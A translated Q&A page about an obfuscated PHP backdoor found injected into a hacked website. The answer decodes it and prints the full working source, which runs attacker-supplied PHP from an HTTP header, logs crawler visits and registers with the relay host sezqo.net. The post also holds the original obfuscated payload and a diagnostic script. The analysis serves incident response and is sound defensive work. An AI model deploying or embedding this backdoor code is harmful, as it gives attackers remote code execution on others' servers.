个人中心
gpt4 book ai didi

php - 我的服务器被黑客入侵,注入(inject)了编码代码。我不知道这段代码的目的是什么?请任何人帮助我

转载 作者:行者123 更新时间:2023-12-04 22:12:51 27 4
gpt4 key购买 nike

我的php文件被黑了,有人将一些编码文本注入了我的文件中。任何人都可以帮助我了解这段代码的实际作用。我无法对此进行解码。

这是该编码的代码段。

/*versio:3.01*/$II11=110426;if (!function_exists('I11lIl1I')){$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';function I11lIl1I($a, $b){$c=$GLOBALS['II11']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};$QO0000QQ0 = I11lIl1I(3374, 16);$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");};

最佳答案

简短答案

它向具有“ http://sezqo.net/w3.php”作为消息中继的僵尸网络或蠕虫宣布自己。此中继很可能只是以相同方式被黑客入侵的服务器。
然后,该“网络”可以将包含要执行的真实代码的请求发回(可能不是立即,而是稍后)。此代码可以替换您的网站(在所有或某些特殊情况下,脚本仅在代码之前执行),并且可以执行PHP脚本可以执行的其他任何操作。

解码和清理脚本

if (!defined("determinator")) {
  if (function_exists("ini_set")) { 
    @ini_set("allow_url_fopen", 1);
    @ini_set("display_errors", 0);
  }

  function w3net_feof($f, &$time = NULL) {
    $time = microtime(true);
    return feof($f);
  }

  function w3net_getfile($host, $URI) {
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $host . $URI. "&w=fgc");
    } elseif (function_exists("curl_init")){
      $ch = @curl_init();
      @curl_setopt($ch, CURLOPT_URL, "http://" . $host . $URI. "&w=cu");
      @curl_setopt($ch, CURLOPT_HEADER, false);
      @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 6);
      $curl_result = @curl_exec($ch);
      @curl_close($ch);
      if (empty($curl_result)) {
        $curl_result = "";
      }
      return $curl_result;
    } else {
      $f = @fsockopen($host, 80, $errno, $errstr, 5);
      if ($f) {
        $data = "";
        $time = NULL;
        @fputs($f, "GET {$URI}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$host}\r\n");
        $useragent = PHP_OS."/".PHP_VERSION;
        @fputs($f, "User-Agent: {$useragent}\r\n\r\n");
        while(!w3net_feof($f, $time) && (microtime(true) - $time) < 2) {
          $data .= @fgets($f, 128);
        }
        @fclose($f);
        $parts = explode("\r\n\r\n", $data);
        unset($parts[0]);
        return implode("\r\n\r\n", $parts);
      }
    }
  }

  function w3net_output($key, $val) {
    echo "Y_".$key.":".$val."\r\n";
  }

  function php_server($varname){
    return @$_SERVER[$varname];
  }

  $version1="ftp/201309";
  $version2="3.01";
  $host="http://";
  if (isset($_SERVER["HTTPS"])) {
    if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
  }
  $host.=strtolower(@$_SERVER["HTTP_HOST"]);

  foreach ($_GET as $key=>$val) {
    if (strpos($val,"union")) {
      $_GET[$key]="";
    } elseif (strpos($val,"select")) {
      $_GET[$key]="";
    }
  }

  if(!isset($_SERVER["REQUEST_URI"])) {
    $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
    if(isset($_SERVER["QUERY_STRING"])) {
      $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
    }
  }

  function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
  }

  if (strlen($host) < 10) {
    define("determinator", 0);

  } elseif ($requestURL=$host.@$_SERVER["REQUEST_URI"]) {
    $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
    $w3n_code=get_temp_directory().".".$hash;
    define("determinator", $w3n_code);
    $IlIlII = $w3n_code.".log";
    if (@$_SERVER["HTTP_Y_AUTH"]==$hash) {
      echo "\r\n";
      w3net_output("versio", $version2."-".$version1."-php");
      if ($code=base64_decode(@$_SERVER["HTTP_EXECPHP"])){
        @eval($code);
        echo "\r\n";
        w3net_output("out", "ok");
      }
      exit(0);
    }
    $found = False;
    $ua = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $pattern) {
      if (strpos($ua, $pattern)!==False) {
        $f = @fopen($w3n_code.".log", "a");
        $requestURI_encoded = @urlencode(@$_SERVER["REQUEST_URI"]);
        @fwrite($f, time()."\t".$pattern."\t".$requestURI_encoded."\n");
        @fclose($f);
        $found=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($found === True) {
      if (@touch($w3n_code)) {
        $requestURL=@urlencode($requestURL);
        $URI = "/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
        $data = w3net_getfile("sezqo.net", $URI);
        @touch($w3n_code);
      }
    }
  } else {
    define("determinator", 1);
  }
}


脚本的作用(详细说明)

好的,它是做什么的?它首先尝试取消一些PHP安全限制(启用“ allow_url_fopen”和禁用“ display_errors”)。然后,它定义函数w3net_feof()(由w3net_getfile()使用)和w3net_getfile($ host,$ URI)。 w3net_getfile用于从URL提取数据。它尝试不同的可能性,例如file_get_contents(如果允许allow_url_fopen),libcurl和通过fsocket函数的简单HTTP实现。它还定义了一个函数w3net_output(),该函数用于根据启动此脚本的请求输出键/值对。它定义了一个函数php_server()来从$ _SERVER检索变量,但是从未使用过。

完成此操作后,它会设置一些版本字符串($ version1和$ version2,似乎是脚本本身的标识符)。然后,它构造一个变量,该变量包含使您可以访问脚本的URL的$ host部分(包括http://或https://)。然后,它从包含“联合”和“选择”的值中清除$ _GET变量(将值设置为空字符串)。我认为这是用来缩短最终URL。并且-如果尚未设置-将$ _SERVER变量“ REQUEST_URI”设置为$ _SERVER [“ SCRIPT_NAME”]。“?”。$ _ SERVER [“ QUERY_STRING”]。

下一步,它定义了一个寻找可写目录的函数,该目录可以放置一些下载内容。

下一步是检查$ host(“ https://”或“ http://”短于10个字符。如果是这种情况,它将停止任何进一步的操作。只有在HTTP-服务器的主机名少于3个字符,这可能是一种阻止此脚本在主机名非常短的特殊设置(如在开发环境中)上运行的方法。

下一步是尝试,如果$ host。@ $ _ SERVER [“ REQUEST_URI”]可以构建$ requestURL,如果可以,则继续执行以下操作:


它构造一个哈希值$ hash(使用 $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");),该值通过主机名,PHP-OS(版本),版本字符串的$ version2“ 3.01”部分和一些盐“ QQ0OQ000000Q0OQ0Q”标识本地系统。
然后,它检查当前请求是否具有等于此哈希的标头“ HTTP_Y_AUTH”。如果是这样,它将通过w3net_output()向请求的客户端计算机返回一些版本信息。然后,它寻找另一个HTTP标头“ HTTP_EXECPHP”,该标头使用eval()作为PHP代码直接执行。此后,脚本通过w3net_output()机制输出return / linefeed和“ out” =“ ok”。然后,它通过exit(0)停止脚本。此部分允许知道确切哈希键的远程计算机访问此脚本并在您的计算机上执行PHP代码。
如果哈希值不匹配(或未发送哈希值),它将检查“用户代理”是否匹配某些模式(google,yahoo,baidu,bingbot,msnbot,yandex的任何字符串)。这些是搜索引擎爬网程序的访问。如果是这样,它将此访问记录到使用 $w3n_code.".log"命名的日志文件中,其中 $w3n_code=get_temp_directory().".".$hash;(找到的哈希目录,附加哈希值,然后附加“ .log”)。它写了一行,由unixtimestamp,匹配的模式(标识搜索引擎)和编码的requestURI(制表符分隔)组成。我假设这是用来记录该位置预期有多少搜索引擎流量。如果那里的访问量很大,则“网站”可能已售出或可通过插入一些指向其他网站的链接来提高某些网站的页面排名。同样,将变量$ found设置为“ true”,将流量标记为“搜索引擎搜寻器”。
下一步,它检查文件 $w3n_code是否存在,文件名类似于上面的日志文件,但末尾没有“ .log”。如果是这样,它将运行包含的PHP代码。
如果该脚本尚不存在,它将检查当前请求是否已被$ found = true;标记为搜索引擎流量。在这种情况下,脚本会通过对 "http://sezqo.net/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2的请求来宣布自己进入网络。该请求包含$ requestURL(如何访问服务器上的此脚本),哈希键(允许进行身份验证并将脚本发送给另一个PHP脚本执行),类型“ php”以及版本字符串$ version1和$ version2。此后,它将调用touch()创建一个名为 $w3n_code的空脚本文件。因此,此请求仅发送一次,第一个搜索引擎通过。


进一步调试

将以下脚本保存到您的网页(同一服务器)上,并使用https://和http://通过浏览器执行。它使用上面脚本的一部分,该脚本生成$ hash并估计存储目录。它输出网络插入的脚本(如果已经)和日志文件的文件名。在同一目录中查找具有相似名称的任何其他文件(尤其是* .log文件)。日志文件将为您提供上述“蠕虫”入侵系统的信息(可能有多个位置)。如果不存在带有“ .log”的文件,则已被感染的脚本已经向网络宣布,并且可能已经执行了通过网络发送的所有代码。如果包含脚本,则每次调用您的网站脚本(包含上面的代码)时都会插入/执行此脚本...

注意:找不到这些文件并不能保证没有任何反应!由于网络可能已经发送了删除所有这些跟踪的PHP脚本... 

<?php

function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
}

$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
  if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);

$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;

echo "FILENAMES:<br>\n";
echo $w3n_code."<br>\n";
echo $w3n_code.".log<br>\n";

?>


我如何提取脚本

好的,要知道它的作用,我对您的脚本进行了解码和分析。这是...

首先,我们将其格式化得更好: 

    /*versio:3.01*/

    $II11=110426;

    if (!function_exists('I11lIl1I')){
      $GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';

      function I11lIl1I($a, $b){ 
        $c=$GLOBALS['II11'];
        $d=pack('H*','6261736536345f6465636f'.'6465');
        return $d(substr($c, $a, $b));
      };

      $QO0000QQ0 = I11lIl1I(3374, 16);
      $QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
    };


我们看到,代码检查功能 I11lIl1I是否已经存在,如果不存在,它将定义该功能并执行一些代码。此函数采用两个参数$ a和$ b,它们定义了解码字符串的某些部分,该字符串稍后将在此函数中使用substr()删除。该函数获取编码文本 $GLOBALS['II11']并将其存储在 $c中。 $d设置为 pack('H*','6261736536345f6465636f'.'6465'),结果为 base64_decode。此函数用于使用限制$ a和$ b解码从$ c切出的部分。用$ a = 3374,$ b = 16调用该函数,导致 preg_replace存储为$ QO0000QQ0。然后调用 preg_replace("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");。而解码功能 I11lIl1I再次用于从编码字符串中获取某些数据($ a = 507,$ b = 2862)。

I11lIl1I(507,2862)中的数据是: 

eval(gzuncompress(base64_decode("eJyNV+tO20oQfpVlhZAtBcfOHXJ8FETDwRKNSQiVqhZZqbMuVh07sjeFCvHuZ2YvtgNOhfjBZmbnsnP5ZhxHxDhasyhO2dqga8ZZvonTFc9yapovJAZ2tEtDHmdpwJ7jgheG5ziJlzie4bSIY5t4bRKncVAwXuP1WqRjm3DDHDewu8B2zoBtA/uVaBPkqZsyHkQsi4zjue37/rxFTo49kHI84pLZ/c2NSV5IRdnEYZ7xeMMMnu8YKMsZ3+UpqatoMvGT8ShOmIGaEgdeAgfH8xITlXtKOQ13eULHyANaAhTFs2gAT+LAwgCJ54FCg66SJHsKQCiIsi1LqUlc0OJQ9Fk5NkGzeDsIs5SzFAJKHznfnrfblFhE+SNPaNUi9OTJjX6GVDyDJQVrSopyEZNxPPdte+6DtxNFNUAUqBCK+d4bICXZlosHQlbEkysme2YhsCZK0FBqW+TyfnHj3y4D+NciH/A93KHrh/VcTy8+TRctEq3gbX+9uZgu7xez5eJidneFEirlhwUu/dlserlcep+n/v2yRQameCuWoAyPeLaWQ1WY8SBMsoLVqBhwttnyP4YShjBXaigdv+rsKqrOFJaqrEE0FxVZ+Avroqq6kY2VB0cnaeFV2/aB0lc2df3KisfekebIfkeA29F2h0WgW4b+N12SF5WFV2phGopf5Hq5vG07lg2E7/n3FP5dZwU/J3B4US69CkZZL1hFt9e3gX9n0Ta18Phlurjz/FmD0fuC5acXP6Gmz8G4lBf6tM6nR2y5o6YmVy8yyckJMd40NTmt2P+QjllFw8KoQi/VvHA6I9Eok0hnUWOADC9mgj1vk2zNDFo619Iq4d4uRahSt7/ZDxWoxJsGOXlP2Hx9jzPZjkOURHuCdvXOBGGGhY8ZoV8DaimmRc/FGfkqQXvAtX3cQsfmv1kunbPnZoUqx8HddAGp+aZYDyh6jL3sJG4Ju/0+BKhnygKCdFecwZnqjrkNf37FGI4AyLtaxKmJOHZHDABZq3EhoqbdqG7hJBiaD3qaTA5fIUcuqYgd0N4zZbLfGO5CjziOCrliW27Bc54B/kJ8moz00NuOiemMspytwkdosAAbZVUQlQL33yo/6Cyo3GYCXJHYqpT1h+gxwgBq+KbEH2o+DoZiuFWIfVAX3hx9TNcreGUcHQz1ENPbx1gjYhzmC+x7zz6zJRsTejCfHYQtZ/ABI1Ytm50uSHVMGA0NhkuV4/0OwiHJAXeDdZyzEFaSP4bqfUBZF4jpCiAiCK68m2kQmNYnbwFg7y++goXbi8UFHFVB29j1F3m++mMQ2l6z3+3icQPNS9t8s21bEUzi010aP1ck73KqKZXHdPn5lj7sU6YlaTr7Ur+hf4JXexQlIOyg9nJ52AG4rNYBlw+mpt5JABjk1fLn0/ZULQ9tKVQc4IZQ5Qx4ezWvAoJVj63u+6rYj9SIU0SxSYij5TZGVq4+RfCUx3z1I2F7ktIZXCgkcUx+gP1fGiXLcSmujUVhixZJqumIYA/w8kLkemrUiqkv6kVvj7rDBNTbvqsRoanGyxaRe5Jvz93JZt3XNi017BQ+WgoOEf4Az2FlWzO3qSytyrl+FyvdUtrHf/G+VCnQFbgyYJpa1zmU6HwAQDsIEPgq11Vm1fPmc7uCkc4IERCnoxw9asLszalqQbdxO5E1KCJRcRxbPlAOlzqjh15WuwuMRd9VbjS53e2UUAKfEOz3KtFSH/SxO8IR0apgposg3zVlVTzH3JAFAlsZ3HAguFe4Y47lyuUhYfL3qdHtDcR3zN7U0OtDdWuAt/YcGcLT+jC+ZJvhJuS/nSnChVbJPXJd4Z3oHtAh/J1Ecl88WBM1m72uSIwsJrXOT3bYUSjZOBPLbsBtDvuYGco2LNe4f5mwiHBqKR/VD6kdfoilrly0pKDcsDHc7hKWt72+14ghv7zK6sfs82wXPhr1jgBgDJPdmgVZGrI9Tq3jdWLhMwutSeRRe7nE+1p4+mIBqEesdyYKUHfWWydMtb4DptQCqUhyJcIFm9QGXW8gVyxL3aoS1huJhUYDQ50xFI6976i+3ZUisgfFUj6XS/m7r1gUgGW1+pAdNwVVoq/6NDmMTGq3+h8qaX6B")));


preg_replace(...)调用使用模式“ /.../e”,该模式在字符串 Q0QO00QOO中查找字符串 Q0QO00QOO,并在每次出现时执行上面的 I11lIl1I(507, 2862)(解码后的字符串)。该代码包含 eval(gzuncompress(base64_decode(" ")));,它再次对字符串进行base64解码,然后解压缩二进制数据并对其进行评估(=执行其php代码)。

未压缩的,经base64解码的文本再次是一些php代码,经过整理的外观如下所示: 

if (!defined("determinator")) {
  if (function_exists(I11lIl1I(1, 10))) { 
    @ini_set(I11lIl1I(14, 20), 1);
    @ini_set(I11lIl1I(34, 19), 0);
  }

  function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
    $I1lI1I = microtime(true);
    return feof($Q0OOOQ);
  }

  function w3net_getfile($I1ll11, $I11IIl) {
    $IIlI1I = "curl";
